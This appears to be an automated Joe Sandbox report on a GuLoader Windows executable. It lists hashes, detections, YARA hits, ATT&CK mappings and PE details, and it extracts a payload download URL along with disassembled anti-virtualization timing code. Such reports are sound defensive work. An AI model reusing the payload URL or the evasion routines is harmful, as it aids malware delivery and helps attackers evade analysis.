Play interactive tour

Edit tour

Analysis Report d81yNmZHaE.exe

Overview

General Information

Sample Name:	d81yNmZHaE.exe
Analysis ID:	432593
MD5:	74b1969d9f41c94a1a07431b65bbf390
SHA1:	54935d5f7a59384ba8d1b26e25bbbc394e91922a
SHA256:	f50e2cbd23d058c6f0b1b147c1ee77ccd969b9f895375aed3c42ccbab0bbbe15
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Potential malicious icon found

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Found potential dummy code loops (likely to delay analysis)

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

PE file contains strange resources

Program does not show much activity (idle)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

d81yNmZHaE.exe (PID: 5416 cmdline: 'C:\Users\user\Desktop\d81yNmZHaE.exe' MD5: 74B1969D9F41C94A1A07431B65BBF390)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://genitoriborgosatollo.it/main/client_sOcehs220.bin, http://amandaduquenoy."}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
d81yNmZHaE.exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.234240857.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.d81yNmZHaE.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
0.2.d81yNmZHaE.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://genitoriborgosatollo.it/main/client_sOcehs220.bin, http://amandaduquenoy."}

Multi AV Scanner detection for submitted file

Show sources

Source: d81yNmZHaE.exe	Virustotal: Detection: 33%			Perma Link
Source: d81yNmZHaE.exe	ReversingLabs: Detection: 39%

Source: d81yNmZHaE.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://genitoriborgosatollo.it/main/client_sOcehs220.bin, http://amandaduquenoy.

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: C:\Users\user\Desktop\d81yNmZHaE.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D6827 NtAllocateVirtualMemory,	0_2_022D6827
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D6A71 NtAllocateVirtualMemory,	0_2_022D6A71
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D6884 NtAllocateVirtualMemory,	0_2_022D6884
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D68C9 NtAllocateVirtualMemory,	0_2_022D68C9
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D6911 NtAllocateVirtualMemory,	0_2_022D6911
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D6955 NtAllocateVirtualMemory,	0_2_022D6955

Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_00401C10	0_2_00401C10
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_004055DB	0_2_004055DB
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D6827	0_2_022D6827
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D3209	0_2_022D3209
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D327D	0_2_022D327D
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D334F	0_2_022D334F
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D33BC	0_2_022D33BC
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D5040	0_2_022D5040
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D512C	0_2_022D512C
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D31AB	0_2_022D31AB
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D91DD	0_2_022D91DD
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D3624	0_2_022D3624
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022DB46C	0_2_022DB46C
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D36AD	0_2_022D36AD
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D46A5	0_2_022D46A5
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022DA68D	0_2_022DA68D
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D46FD	0_2_022D46FD
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022DA6D9	0_2_022DA6D9
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D2702	0_2_022D2702
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D1765	0_2_022D1765
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022DA74C	0_2_022DA74C
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D47A9	0_2_022D47A9
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022DA7BD	0_2_022DA7BD
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D47CF	0_2_022D47CF
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D346D	0_2_022D346D
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022DB46C	0_2_022DB46C
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D5471	0_2_022D5471
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D3451	0_2_022D3451
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D3531	0_2_022D3531
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D65BD	0_2_022D65BD
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D6584	0_2_022D6584
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022DBA0B	0_2_022DBA0B
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D2A4A	0_2_022D2A4A
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4A88	0_2_022D4A88
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4AF4	0_2_022D4AF4
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4B81	0_2_022D4B81
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D88B9	0_2_022D88B9
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D6884	0_2_022D6884
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D68C9	0_2_022D68C9
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D6911	0_2_022D6911
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4969	0_2_022D4969
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D6955	0_2_022D6955
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D49EC	0_2_022D49EC
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4EC9	0_2_022D4EC9
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D1F7F	0_2_022D1F7F
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D3F94	0_2_022D3F94
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D1FE4	0_2_022D1FE4
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4C25	0_2_022D4C25
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D2C99	0_2_022D2C99
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D2D32	0_2_022D2D32
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4D5C	0_2_022D4D5C
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D2DAD	0_2_022D2DAD
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4DB5	0_2_022D4DB5

Source: d81yNmZHaE.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: d81yNmZHaE.exe, 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBlver.exe vs d81yNmZHaE.exe
Source: d81yNmZHaE.exe, 00000000.00000002.761074940.00000000021F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs d81yNmZHaE.exe
Source: d81yNmZHaE.exe	Binary or memory string: OriginalFilenameBlver.exe vs d81yNmZHaE.exe

Source: d81yNmZHaE.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal88.rans.troj.evad.winEXE@1/0@0/0

Source: d81yNmZHaE.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\d81yNmZHaE.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\d81yNmZHaE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: d81yNmZHaE.exe	Virustotal: Detection: 33%
Source: d81yNmZHaE.exe	ReversingLabs: Detection: 39%

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: d81yNmZHaE.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.234240857.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.0.d81yNmZHaE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.d81yNmZHaE.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_004030EE push dword ptr [ebp-44h]; ret	0_2_0041E804
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_00408957 push ecx; retf	0_2_00408A01
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_0040953D push es; retf	0_2_0040953E
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D72B9 push ebx; iretd	0_2_022D72C7
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D0041 push cs; iretd	0_2_022D004B
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D00C0 push cs; iretd	0_2_022D00CA
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D678D push cs; iretd	0_2_022D678E
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D5A5A push ebp; retf	0_2_022D5A62

Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D6827 NtAllocateVirtualMemory,	0_2_022D6827
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D31AB	0_2_022D31AB
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D46A5	0_2_022D46A5
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D46FD	0_2_022D46FD
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D2702	0_2_022D2702
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D47A9	0_2_022D47A9
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D47CF	0_2_022D47CF
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022DBA0B	0_2_022DBA0B
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4A88	0_2_022D4A88
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4AF4	0_2_022D4AF4
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4B81	0_2_022D4B81
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D88B9	0_2_022D88B9
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4969	0_2_022D4969
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D49EC	0_2_022D49EC
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D4C25	0_2_022D4C25

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\d81yNmZHaE.exe

RDTSC instruction interceptor: First address: 00000000022D6127 second address: 00000000022D6127 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 54424F80h 0x00000007 xor eax, BD2BBA67h 0x0000000c add eax, 30109B8Dh 0x00000011 sub eax, 197A9173h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F36F0AD3678h 0x0000001e lfence 0x00000021 mov edx, 99F040D7h 0x00000026 add edx, 65972F3Fh 0x0000002c xor edx, B7C92FC9h 0x00000032 xor edx, 37B05FCBh 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d ret 0x0000003e sub edx, esi 0x00000040 ret 0x00000041 pop ecx 0x00000042 add edi, edx 0x00000044 dec ecx 0x00000045 cmp ecx, 00000000h 0x00000048 jne 00007F36F0AD3655h 0x0000004a mov dword ptr [ebp+00000249h], eax 0x00000050 mov eax, ecx 0x00000052 push eax 0x00000053 mov eax, dword ptr [ebp+00000249h] 0x00000059 call 00007F36F0AD3687h 0x0000005e call 00007F36F0AD3699h 0x00000063 lfence 0x00000066 mov edx, 99F040D7h 0x0000006b add edx, 65972F3Fh 0x00000071 xor edx, B7C92FC9h 0x00000077 xor edx, 37B05FCBh 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 ret 0x00000083 mov esi, edx 0x00000085 pushad 0x00000086 rdtsc

Source: C:\Users\user\Desktop\d81yNmZHaE.exe

Code function: 0_2_022D6827 rdtsc

0_2_022D6827

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Users\user\Desktop\d81yNmZHaE.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Users\user\Desktop\d81yNmZHaE.exe

Code function: 0_2_022D6827 rdtsc

0_2_022D6827

Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D90E4 mov eax, dword ptr fs:[00000030h]	0_2_022D90E4
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D31AB mov eax, dword ptr fs:[00000030h]	0_2_022D31AB
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022DA68D mov eax, dword ptr fs:[00000030h]	0_2_022DA68D
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022DA6D9 mov eax, dword ptr fs:[00000030h]	0_2_022DA6D9
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D9AC5 mov eax, dword ptr fs:[00000030h]	0_2_022D9AC5
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D3BBC mov eax, dword ptr fs:[00000030h]	0_2_022D3BBC
Source: C:\Users\user\Desktop\d81yNmZHaE.exe	Code function: 0_2_022D3F94 mov eax, dword ptr fs:[00000030h]	0_2_022D3F94

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: d81yNmZHaE.exe, 00000000.00000002.760833387.0000000000D80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: d81yNmZHaE.exe, 00000000.00000002.760833387.0000000000D80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: d81yNmZHaE.exe, 00000000.00000002.760833387.0000000000D80000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: d81yNmZHaE.exe, 00000000.00000002.760833387.0000000000D80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: d81yNmZHaE.exe, 00000000.00000002.760833387.0000000000D80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery31	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery21	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
d81yNmZHaE.exe	33%	Virustotal		Browse
d81yNmZHaE.exe	39%	ReversingLabs	Win32.Trojan.Jaik

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://genitoriborgosatollo.it/main/client_sOcehs220.bin, http://amandaduquenoy.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://genitoriborgosatollo.it/main/client_sOcehs220.bin, http://amandaduquenoy.	true	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	432593
Start date:	10.06.2021
Start time:	15:19:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	d81yNmZHaE.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.rans.troj.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 1.4% (good quality ratio 0.3%) Quality average: 11.5% Quality standard deviation: 20.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, SearchUI.exe, RuntimeBroker.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.567506613853901
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	d81yNmZHaE.exe
File size:	147456
MD5:	74b1969d9f41c94a1a07431b65bbf390
SHA1:	54935d5f7a59384ba8d1b26e25bbbc394e91922a
SHA256:	f50e2cbd23d058c6f0b1b147c1ee77ccd969b9f895375aed3c42ccbab0bbbe15
SHA512:	1f20e36948015e46dc30cc1b1aa7e03cb0c8586e045bfe02d0794b3306cb1ddbbf43b62c737d8a90b2db5ff5f85de9fa96af97e4e978f223fa9dc6a37ba9ad7c
SSDEEP:	1536:vMaIFFEMgx3vnWE7Hpm6IJNTcXmXSt4lYEQe3pyzBEkWKS:ExFQvWy8lxc14lwe3pyzyjKS
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...N.DU.....................0............... ....@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401c10
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5544D64E [Sat May 2 13:51:10 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9b8686288ab82fdbf8ede30bc55c83b7

Entrypoint Preview

Instruction
push 00401FBCh
call 00007F36F0BC1175h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xchg eax, edi
xchg eax, esp
mov byte ptr [B6A34098h+esi*8], bh
pop ss
inc ebp
inc esp
sbb dword ptr [eax+0000004Dh], ebp
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, bh
call 00007F3755FE1371h
insb
insb
jns 00007F36F0BC11E3h
arpl word ptr [eax+65h], bp
jc 00007F36F0BC1182h
add ah, dh
jnl 00007F36F0BC1183h
add eax, dword ptr [eax]
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
subps xmm4, dqword ptr [esi+4Eh]
dec eax
pop eax
jnl 00007F36F0BC11B3h
inc esi
mov ch, 6Fh
jecxz 00007F36F0BC1102h
pop esi
and edx, esp
xlatb
out 06h, eax
lahf
js 00007F36F0BC1180h
pop ebp
inc ebx
inc ecx
cdq
jmp 00007F36F0BC11F7h
xchg byte ptr [eax], bl
test dword ptr [eax], AD4F3AC5h
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
cdq
add al, byte ptr [eax]
add byte ptr [edx+00h], cl
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [ecx+ebp*2+76h], cl
jc 00007F36F0BC11EBh
jnc 00007F36F0BC11F6h
xor al, byte ptr [eax]
or eax, 53000A01h
dec ebx
inc ecx
inc edx
inc ecx
inc edi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x20a84	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x938	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1c4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20148	0x21000	False	0.350423177083	data	5.81715288276	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x1250	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x938	0x1000	False	0.16943359375	data	2.00254326763	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x24808	0x130	data
RT_ICON	0x24520	0x2e8	data
RT_ICON	0x243f8	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x243c8	0x30	data
RT_VERSION	0x24150	0x278	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

